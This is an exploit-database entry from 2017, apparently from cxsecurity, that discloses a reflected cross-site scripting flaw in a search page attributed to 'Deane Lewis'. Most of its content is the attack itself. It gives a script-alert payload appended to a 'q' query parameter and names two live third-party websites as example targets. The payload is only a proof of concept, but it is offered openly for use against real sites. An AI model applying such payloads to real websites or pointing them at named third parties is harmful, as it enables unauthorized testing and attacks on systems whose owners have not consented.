Deane Lewis Cross Site Scripting

Published
Credit
Risk
2017.02.10
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: Deane Lewis Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Google Dork: N/A
|[+]
|[+] Tested on: Win 8.1 / Mozilla Firefox
|[+]
|[+] Date: 2017 10 February
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] choose a target and add "<script>alert(/XSS Vuln/)</script>" after URL!
|[+] To see Vulnerability!
|--------------------------------------------------------------|
|[+]
|[+] Examples :
|[+]
|[+] http://www.owlpages.com/owls/search.php?q=<script>alert(/XSS Vuln/)</script>
|[+] http://dl.id.au/1/search.php?q=<script>alert(/XSS Vuln/)</script>
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : 1TED
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com